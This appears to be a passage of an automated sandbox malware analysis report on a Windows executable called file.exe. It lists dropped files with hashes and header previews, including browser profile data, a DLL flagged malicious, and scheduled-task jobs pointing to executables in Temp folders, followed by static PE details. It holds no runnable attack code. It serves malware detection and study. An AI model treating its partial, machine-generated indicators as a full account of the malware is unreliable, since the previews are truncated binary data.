                                                                                        Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{87ef1fa3-cb84-4bbf-a615-45a1d14b629d}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):36830
                                                                                        Entropy (8bit):5.185052013683835
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:AI4wvfCXh496G4C4U1W4z4xuHhvp4N4Tc4Z4S4t24U:AruBv3
                                                                                        MD5:10E2D85FEF0DB266E519048D63617FA8
                                                                                        SHA1:EBB307C44EBEFFA271AC58FDDE5C3A1BA52AE7B0
                                                                                        SHA-256:92143A48F55639B5BD01385D0E4E78EDED4F84401A91C12AC06251EE188CFE0E
                                                                                        SHA-512:164CBE725B44020AD40D165A1B1C242A7016ED8933AB9502D0D38E6CD99887D9DF49533DE54068AA4E5D8476C7791B52518A8477B8961475B7CB2C3AF54B81B1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{87ef1fa3-cb84-4bbf-a615-45a1d14b629d}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1021904
                                                                                        Entropy (8bit):6.648417932394748
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                        MD5:FE3355639648C417E8307C6D051E3E37
                                                                                        SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                        SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                        SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1021904
                                                                                        Entropy (8bit):6.648417932394748
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                        MD5:FE3355639648C417E8307C6D051E3E37
                                                                                        SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                        SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                        SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):116
                                                                                        Entropy (8bit):4.968220104601006
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                        MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                        SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                        SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                        SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):116
                                                                                        Entropy (8bit):4.968220104601006
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                        MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                        SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                        SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                        SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs-1.js

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):14072
                                                                                        Entropy (8bit):5.465786671998671
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:GnTFTRRUYbBp6DLZNMGaXo6qU41Ozy+/3/7tY5RYiNBw8d0ASl:sKe+FNMHmuyCWdwO0
                                                                                        MD5:9299631759C5317058C0EAA5FF7F441D
                                                                                        SHA1:F6951F14BCAD3BCB137AEA7BA7FAF100D9DAF58C
                                                                                        SHA-256:3BE45527214DE5AE3C3BE5145170CB558ED6032D9FED43D188E92EBF46E489AB
                                                                                        SHA-512:2A472C2E6FE5C3CE3A6633B8662B5359F1E9068CE04A13CB0DD79A143A3908565B5BFACE6E6A04D0AEF34E3B11A79D6353D5C3F077926C9BD30661166F81757E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1721802599);..user_pref("app.update.lastUpdateTime.background-update-timer", 1721802599);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..u

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):14072
                                                                                        Entropy (8bit):5.465786671998671
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:GnTFTRRUYbBp6DLZNMGaXo6qU41Ozy+/3/7tY5RYiNBw8d0ASl:sKe+FNMHmuyCWdwO0
                                                                                        MD5:9299631759C5317058C0EAA5FF7F441D
                                                                                        SHA1:F6951F14BCAD3BCB137AEA7BA7FAF100D9DAF58C
                                                                                        SHA-256:3BE45527214DE5AE3C3BE5145170CB558ED6032D9FED43D188E92EBF46E489AB
                                                                                        SHA-512:2A472C2E6FE5C3CE3A6633B8662B5359F1E9068CE04A13CB0DD79A143A3908565B5BFACE6E6A04D0AEF34E3B11A79D6353D5C3F077926C9BD30661166F81757E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1721802599);..user_pref("app.update.lastUpdateTime.background-update-timer", 1721802599);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..u

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\1b01b348-3bd3-4e15-baf7-4b32a473bb9f (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):493
                                                                                        Entropy (8bit):4.972833607095534
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YZFgzrbVGAIe8IVHlW8cOlZGV1AQIYzvZcyBuLZ9Q:YocTbSlCOlZGV1AQIWZcy6ZO
                                                                                        MD5:4245CE14A69D84746835AC2BEAED79E6
                                                                                        SHA1:4046EA7CFBFF962122521084ACA7858A6BAC03F8
                                                                                        SHA-256:8B62C32357A7A26F3E3331CF1523293F6663B13A8011AB35FD4CC221C566DD8C
                                                                                        SHA-512:96E997BC7DA61F33424E08BBCC1772FC353456674D2341B8D1CAC2D5FE9F8BC0BED657DC2CD575DD33712DC03B39593D48682F77389ABD606BE7791FFCE3B970
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"type":"health","id":"1b01b348-3bd3-4e15-baf7-4b32a473bb9f","creationDate":"2024-07-24T06:30:27.602Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"os":{"name":"WINNT","version":"10.0"},"reason":"immediate","sendFailure":{"eUnreachable":1}},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb"}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\1b01b348-3bd3-4e15-baf7-4b32a473bb9f.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):493
                                                                                        Entropy (8bit):4.972833607095534
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YZFgzrbVGAIe8IVHlW8cOlZGV1AQIYzvZcyBuLZ9Q:YocTbSlCOlZGV1AQIWZcy6ZO
                                                                                        MD5:4245CE14A69D84746835AC2BEAED79E6
                                                                                        SHA1:4046EA7CFBFF962122521084ACA7858A6BAC03F8
                                                                                        SHA-256:8B62C32357A7A26F3E3331CF1523293F6663B13A8011AB35FD4CC221C566DD8C
                                                                                        SHA-512:96E997BC7DA61F33424E08BBCC1772FC353456674D2341B8D1CAC2D5FE9F8BC0BED657DC2CD575DD33712DC03B39593D48682F77389ABD606BE7791FFCE3B970
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"type":"health","id":"1b01b348-3bd3-4e15-baf7-4b32a473bb9f","creationDate":"2024-07-24T06:30:27.602Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"os":{"name":"WINNT","version":"10.0"},"reason":"immediate","sendFailure":{"eUnreachable":1}},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb"}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):90
                                                                                        Entropy (8bit):4.194538242412464
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                        MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                        SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                        SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                        SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):90
                                                                                        Entropy (8bit):4.194538242412464
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                        MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                        SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                        SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                        SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\recovery.jsonlz4 (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:Mozilla lz4 compressed data, originally 5764 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):1533
                                                                                        Entropy (8bit):6.315602136142654
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:vSSUGLocj9p0LXreU726TUn1/T5sCIUZHVvwKXjF1rILhWydUy91hxgmaoRhwvRb:Kp4/9m/eU72zftNwC51rIgmRh4CY
                                                                                        MD5:5BE4356FF8CB166747ECF17251DBBC65
                                                                                        SHA1:40D1DAA7468A762B44E9760354F092BF08239426
                                                                                        SHA-256:99F73071AF4F1E1C51F18B90F6C206DDA09D449ADA558EE27666F8DE3729D8BB
                                                                                        SHA-512:1CE0DF77D3128BDDA2472E759DB980D6C7932B149B4A16E41B26EBF9E1DB9410D461290D2BF06B1C6D0C9D335F19466CA3CDF3529AB8DF5A926A2C9613736C32
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://www.youtube.com/account","title*....cacheKey":0,"ID":6,"docshellUU...D"{cfcc75da-5042-4908-8732-fbdc24425f4c}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":7,"persist":true}],"lastAccessed":1721803077683,"hiddey..searchMode...userContextId...attribut...{},"index":1...questedI..p0,"imagu...chrome://global/skin/icons/warning.svg"..aselect...,"_closedT..@],"_...C..aGroupC...:-1,"busy...t...Flags":2167541758S...dth":1164,"height":891,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace:...46f3a197-db49-410a-81b3-94975c835573","zD..1...W...l...........:..?.1":{..jUpdate...9,"startTim..p2566062...centCrash..B0},".....Dcooku. hoc..."addons.mozilla.org","valu...Abfc0b67c202aaf415a5b7a51708a5c3270bb6f2f7664428a48797f00afbef6fc","path":"/","na..a"taarI|.Recure...,..Donly..fexpiry...26908,"originA...."firstPartyDomain":"","geckoViewS........

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\recovery.jsonlz4.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:Mozilla lz4 compressed data, originally 5764 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):1533
                                                                                        Entropy (8bit):6.315602136142654
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:vSSUGLocj9p0LXreU726TUn1/T5sCIUZHVvwKXjF1rILhWydUy91hxgmaoRhwvRb:Kp4/9m/eU72zftNwC51rIgmRh4CY
                                                                                        MD5:5BE4356FF8CB166747ECF17251DBBC65
                                                                                        SHA1:40D1DAA7468A762B44E9760354F092BF08239426
                                                                                        SHA-256:99F73071AF4F1E1C51F18B90F6C206DDA09D449ADA558EE27666F8DE3729D8BB
                                                                                        SHA-512:1CE0DF77D3128BDDA2472E759DB980D6C7932B149B4A16E41B26EBF9E1DB9410D461290D2BF06B1C6D0C9D335F19466CA3CDF3529AB8DF5A926A2C9613736C32
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://www.youtube.com/account","title*....cacheKey":0,"ID":6,"docshellUU...D"{cfcc75da-5042-4908-8732-fbdc24425f4c}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":7,"persist":true}],"lastAccessed":1721803077683,"hiddey..searchMode...userContextId...attribut...{},"index":1...questedI..p0,"imagu...chrome://global/skin/icons/warning.svg"..aselect...,"_closedT..@],"_...C..aGroupC...:-1,"busy...t...Flags":2167541758S...dth":1164,"height":891,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace:...46f3a197-db49-410a-81b3-94975c835573","zD..1...W...l...........:..?.1":{..jUpdate...9,"startTim..p2566062...centCrash..B0},".....Dcooku. hoc..."addons.mozilla.org","valu...Abfc0b67c202aaf415a5b7a51708a5c3270bb6f2f7664428a48797f00afbef6fc","path":"/","na..a"taarI|.Recure...,..Donly..fexpiry...26908,"originA...."firstPartyDomain":"","geckoViewS........

                                                                                        C:\Windows\Tasks\axplong.job

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\RoamingCBGCBGCAFI.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):3.4298516015341756
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:351/VXlXUEZ+lX1YC7UPelkDdtE9+AQy0l1C1ut0:zR1Q1h7keeDs9+nV12ut0
                                                                                        MD5:2C32D5B0368CF6A8958EBC734B95D2D1
                                                                                        SHA1:E137338B44D827839E9BF4C49720429718B54653
                                                                                        SHA-256:9A90A5E6809A038DDEDFCF7084A0A3F294C5EEDF1CE1C0A65F01301EF1F4A1A5
                                                                                        SHA-512:31A4E5D519BCBF48464BC0C19330B38B105F375A0916838EE3D889BE72A398574106AD75173FF753D18D3111220F73EE03685ED78534A825372B6416C01FB973
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:....).... mF.OJ.6..}F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.8.2.5.4.6.2.4.2.4.3.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

                                                                                        C:\Windows\Tasks\explorti.job

                                                                                        Download File
                                                                                        Process:C:\Users\userGDHIIIIEHC.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):306
                                                                                        Entropy (8bit):3.4291472729511825
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:hGVXkDZXaXUEZ+lX1QYShMl6lm6tE9+AQy0l1C1ut0:h3laQ13vgQ9+nV12ut0
                                                                                        MD5:69EFF343E22605AF1E092E9607C36178
                                                                                        SHA1:F98B60518A80F1B37E7E613461A8E5FDEE92260F
                                                                                        SHA-256:DFFD3D13770F5D69266D748927DD81041EFC09EF2ECE95819A574D12345BC7BA
                                                                                        SHA-512:EC5BDBE519E5A9C9A5FF9AC3B4DEA577FEA210CE420C247C256821609876EA8CE9C169CB6A73FC937DC168B40040E5976F128D19CCE38E933594A6CE76DC6486
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......;..'0F.C..<..GF.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.471111007846722
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:PzZfpi6ceLPx9skLmb0fiZWSP3aJG8nAgeiJRMMhA2zX4WABluuNXjDH5S:bZHtiZWOKnMM6bFppj4
                                                                                        MD5:2BF515F349B272BE848C0E6D37FD2A87
                                                                                        SHA1:B59581C1F416276765BB06DE40F6BBB0831D3856
                                                                                        SHA-256:895959163A07B485CFE3527E5D98A73EEED7A59A3AD1BDC40828F14412EA3C58
                                                                                        SHA-512:8054245A8BB3F506BEBFB94436473DE20D45A1A39261DFC30FD89DFA9D27AA27A59BFBF7253EE0E291088C1743667247D07398D25DD0997FA9ABB9A896288031
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj]._................................................................................................................................................................................................................................................................................................................................................D..k........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.004479850578073
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:214'528 bytes
                                                                                        MD5:ead5c20b175ebddfc294f19d276d9f5a
                                                                                        SHA1:f74b6cecb5a68042dee54de356a2ab8ca9d7f622
                                                                                        SHA256:7e559097f4e87c8e7d7850bf969e86fa556f090455318c79abc23514201f99d4
                                                                                        SHA512:2ad1a7460b4937cae9702ef5c3c0195ebfea3a352dbc6d978da978120e546b5c1b63c12d0a0a3d16b2f960d168437f477431f7e51ad6e6a078920cdc37e09cce
                                                                                        SSDEEP:3072:PLvfMR1x/WF2sMe/ZLahwlaMS3dpPEoPWZ3G0P7705YHDghMGwQ:PLvUR1x/uxWrpPh2jvGwQ
                                                                                        TLSH:7C24CF103660C472CE9A53724A29D6A51D297F225BF1808F7AC53B5FEE731F03A29F46
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v..y...y...y..f6...y...+...y...+...y...+...y....c..y...y...y...+...y...+...y...+...y..Rich.y..........................PE..L..

                                                                                        File Icon

                                                                                        Icon Hash:cb97354d5555599a

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x401611
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
